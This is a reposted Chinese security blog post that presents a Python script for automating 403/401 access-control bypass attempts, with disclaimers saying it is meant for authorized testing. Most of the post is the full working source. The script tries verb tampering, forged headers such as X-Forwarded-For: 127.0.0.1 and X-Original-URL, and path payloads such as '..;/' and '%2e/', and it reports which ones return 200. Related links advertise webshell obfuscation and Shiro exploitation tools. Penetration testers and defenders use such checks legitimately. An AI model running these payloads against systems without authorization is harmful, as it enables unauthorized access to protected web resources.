文章总结: 本文介绍了一款自动化403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等技巧。提供了完整Python源码,演示了通过修改HTTP方法、伪造IP头部及构造特殊路径来绕过Web服务器访问限制的方法。测试人员可利用该工具快速验证授权漏洞。 综合评分: 72 文章分类: WEB安全,安全工具,渗透测试
一款自动化403/401绕过工具 | 请求头注入、谓词篡改等多种实战技巧
Adonis-363 Adonis-363
夜组安全
2026年1月16日 08:01 美国
免责声明
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!所有工具安全性自测!!!VX:NightCTI
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全“设为星标”,否则可能就看不到了啦!
工具介绍
一款自动化的403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等多种实战技巧。
工具使用
python run.py -u http://xx.com
run.py
import requests
import argparse
import urllib3
from urllib.parse import urlparse
# 忽略 SSL 警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BypassScanner:
def __init__(self, target_url):
self.target = target_url.rstrip('/')
self.path = urlparse(target_url).path
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AF-Service-Scanner/1.0"
}
def scan(self):
print(f"[*] Starting Bypass Scan for: {self.target}\n")
# 1. 谓词篡改 (Verb Tampering)
methods = ["GET", "POST", "HEAD", "PUT", "TRACE", "OPTIONS"]
for m in methods:
self._request(m, self.target, title=f"Method: {m}")
# 2. Header 注入
bypass_headers = [
{"X-Forwarded-For": "127.0.0.1"},
{"X-Custom-IP-Authorization": "127.0.0.1"},
{"X-Original-URL": self.path},
{"X-Rewrite-URL": self.path},
{"X-Remote-IP": "127.0.0.1"},
{"X-Host": "127.0.0.1"}
]
for h in bypass_headers:
self._request("GET", self.target, headers=h, title=f"Header: {list(h.keys())[0]}")
# 3. 路径变形 (Path Fuzzing)
# 包含你提到的 ..;/ 和 ../
path_payloads = [
f"{self.target}/",
f"{self.target}/.",
f"{self.target}..;/",
f"{self.target}/..;/",
f"{self.target}/%2e/",
f"{self.target}//",
f"{self.target}.json"
]
for p in path_payloads:
self._request("GET", p, title=f"Path: {p.replace(self.target, '')}")
def _request(self, method, url, headers=None, title=""):
test_headers = self.headers.copy()
if headers:
test_headers.update(headers)
try:
resp = requests.request(method, url, headers=test_headers, verify=False, timeout=5, allow_redirects=False)
color = "\033[92m"if resp.status_code == 200 else"\033[90m"
print(f"{color}[{resp.status_code}] {title} \033[0m")
except Exception as e:
print(f"[!] Error on {title}: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="403/401 Bypass Automation Tool")
parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://example.com/admin)")
args = parser.parse_args()
scanner = BypassScanner(args.url)
scanner.scan()
工具获取
点击关注下方名片进入公众号
回复关键字【260116】获取下载链接
往期精彩
[Burp Suite插件 | 高级HTTP头修改安全头来绕过安全限制、不同来源或设备的请求
2026-01-12
](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247496101&idx=1&sn=731e9d4fa9782a4bfdcc8622d4bf16b9&scene=21#wechatredirect)[Webshell_Generate更新V1.2.6! | 各类webshell免杀,支持蚁剑、冰蝎、哥斯拉等
2026-01-09
](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247496095&idx=1&sn=201f62e956bc5954c4aecc6204f1f16d&scene=21#wechatredirect)[新一代Webshell 管理与后渗透平台 | 去除通信流量强特征,支持自定义流量格式实现流量伪装
2026-01-08
](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247496090&idx=1&sn=e56acbfd4147b9a2b07f2f73a333561b&scene=21#wechatredirect)[Burp Suite插件 | AI连接本地工具、数据库或远程 Agent,辅助安全测试。
2026-01-07
](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247496073&idx=1&sn=136cb9b4aff4f4975877bbd2df485a04&scene=21#wechatredirect)[Shiro漏洞利用工具,更新V0.2!
2026-01-06
](https://mp.weixin.qq.com/s?_biz=Mzk0ODM0NDIxNQ==&mid=2247496061&idx=1&sn=e7bf2f8b466e65ba8ca509f5fdcc8f03&scene=21#wechatredirect)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:夜组安全 Adonis-363 Adonis-363《一款自动化403/401绕过工具 | 请求头注入、谓词篡改等多种实战技巧》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论